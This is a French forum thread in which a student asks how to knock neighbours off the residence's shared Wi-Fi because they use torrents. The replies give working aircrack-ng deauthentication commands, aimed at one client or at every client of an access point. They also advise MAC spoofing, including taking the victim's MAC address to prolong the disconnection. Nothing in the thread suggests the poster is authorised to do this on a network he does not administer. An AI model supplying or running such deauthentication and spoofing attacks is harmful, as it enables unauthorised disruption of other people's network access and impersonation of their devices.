Aller au contenu
  • Pas encore inscrit ?

Pourquoi ne pas vous inscrire ? C'est simple, rapide et gratuit.
    Pour en savoir plus, lisez Les avantages de l'inscription... et la Charte de Zébulon.
    De plus, les messages que vous postez en tant qu'invité restent invisibles tant qu'un modérateur ne les a pas validés. Inscrivez-vous, ce sera un gain de temps pour tout le monde, vous, les helpeurs et les modérateurs ! :wink:

Messages recommandés

Posté(e)

Salut à tous,

Voilà, j'habite une résidence étudiante(qui n'appartient pas à l'université), et on a un accès Internet via Wifi(fourni par une société privé).

En gros, on doit avoir du 10meg pour 30 personnes, ça fait pas bezef mais ça suffit pour surfer!

Problème, c'est qu'il y a des bouff*** qui pensent qu'à leur gueule et qui se permettent de faire du torrent sur le réseau.

J'ai scanné le réseau (nmap), et en gros on a 2-3 bornes Wifi qui sont connectées à un routeur NetGear.

Les MDP des bêtes sont changées heureusement(enfin malheureusement dans mon cas :P )

Enfin en gros, vu que j'ai aucun moyen de savoir à qui appartient la machine, et que j'ai pas envie de me taper les 30 chambres à visiter et à demander si quelqu'un télécharge et avec un résultat qui s'approchera sûrement de 0, j'aimerai savoir si j'ai un moyen de déco(pendant quelques instant seulement), une machine?

IP Spoofing?

Merci

Posté(e) (modifié)

Salut lol.2.lol

IP Spoofing?
Sur un LAN, et suivant le paramétrage du routeur, je lui préfère MAC spoofing.

Sinon, as tu essayé un truc du genre :

aireplay-ng -0 0 -a 00:0x:xx:xx:xx:xx -c 00:1x:xx:xx:xx:x0 wlan0

(où 00:0x:xx:xx:xx est le point d'accès et 00:1x.xx.xx.xx.x0 est le client à de-authentifié)

ou carrément un :

airplay-ng -0 0 -a 00.1x:xx:xx:xx:xx wlan0

(pas de précisions sur le client donc on de-authentifie tout le monde, le tien y compris)

Modifié par Pang
Posté(e)
Surtout que j'ai tout les outil sous la main :P
M'en doutais un peu :P

Je remarque toutefois qu'avec les nouveaux routeurs, de-auth fonctionne de moins en moins...

Et lorsque ça fonctionne, le temps de déconnexion est vraiment bref, à tel point que parfois le client peut ne même pas s'en rendre compte... sauf si entre temps tu lui piques son adresse MAC :P